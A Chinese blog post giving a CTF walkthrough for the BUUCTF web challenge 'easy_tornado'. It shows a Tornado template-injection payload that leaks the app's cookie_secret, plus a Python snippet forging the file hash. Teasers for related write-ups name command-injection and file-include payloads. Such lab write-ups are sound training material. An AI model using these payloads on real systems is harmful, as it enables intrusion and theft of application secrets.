当前位置:首页 > CTF > BUU > 正文内容

BUUCTF_web_第11题:[护网杯 2018]easy_tornado

七星6个月前 (01-22)BUU386


开靶场, 有三个文件链接,依次点开, 有个提示:

flag in /fllllllllllllag

然后观察url发现,访问文件是需要提交一个filehash值的:

/file?filename=/flag.txt&filehash=dd0615f233fad6361566815aa4ee40c0

是一串md5,再看看hint.txt这个文件:

md5(cookie_secret+md5(filename))

我们需要知道的是cookie_secret.

还有个welcome.txt文件, 给的提示是render

render是python的渲染函数,也就是一种模板,所以可能存在模板注入

尝试访问一下下/fllllllllllllag文件,得到了报错url

/error?msg=Error

msg会返回他的值,测试:

/error?msg={{4*4}}

返回ORZ,模板注入实锤了.

在模板中, 存在一些可以访问的快速对象,

这里用到的是handler.settings

handler 指向RequestHandler

而RequestHandler.settings又指向self.application.settings

所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量:

/error?msg={{handler.settings}}

得到:

{'autoreload': True, 'compiled_template_cache': False, 'cookie_secret': 'e2a54be9-b2db-4fa4-a58b-8c2ac8d89bb2'}

然后把就直接通过md5(cookie_secret+md5(filename))构造出来了payload:

import hashlib
hashlib.new('md5',str('e2a54be9-b2db-4fa4-a58b-8c2ac8d89bb2'+str(hashlib.new('md5',b'/fllllllllllllag').hexdigest())).encode(encoding='UTF-8')).hexdigest()

得到/fllllllllllllag文件的filehash, 然后直接拼接访问,get弗拉格



转载请声名出处|qixingbit.com

相关文章

BUUCTF_web_第12题:[极客大挑战 2019]Knife

BUUCTF_web_第12题:[极客大挑战 2019]Knife

本题考查了中国菜刀的使用, 及简单一句话理解阅读题目打开, 发现给了一句话:直接用中国菜刀连上:在根目录下直接找到了flag...

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

BUUCTF_web_第六题:[ACTF2020 新生赛]Include

发现是一道include的题, 啥提示也没有,点一下给个tips, 获取到一个?file=flag.php很自然想到了include可以把文件base64再读取文件:/?file=php:/...

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

BUUCTF_web_第九题:[GXYCTF2019]Ping Ping Ping

是个ping, 传入/?ip=127.0.0.1看看命令执行, 立刻想到||管道符:/?ip=127.0.0.1||ls不行, 那就封号;/?ip=127.0.0.1;ls成功获得两个文件名flag....

BUUCTF_web_第一题: [HCTF 2018]WarmUp

BUUCTF_web_第一题: [HCTF 2018]WarmUp

第一题: [HCTF 2018]WarmUp f12, 注释里有个文件, 访问, 成功获得审计代码. 审计代码里有个hint.php, 打开, 成功获得ffffllllaaaagggg,...

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

BUUCTF_web_第15题:[极客大挑战 2019]PHP_序列化详解

打开题目, 有个猫, 先云吸个猫再说. 然后提到了备份网站. 既然是备份那自然想到的是www.rar或者zip之类的, 再不行就爆破一下路径也就出来了, 这个题是www.zip, 直接访问,...

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

BUUCTF_web_第四题:[极客大挑战 2019]Havefun

开局一直猫, flag全靠f12:<!--˂!----˃$cat=$_GET['cat'];echo $cat;if($cat=='dog'){    echo 'Syc{c...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。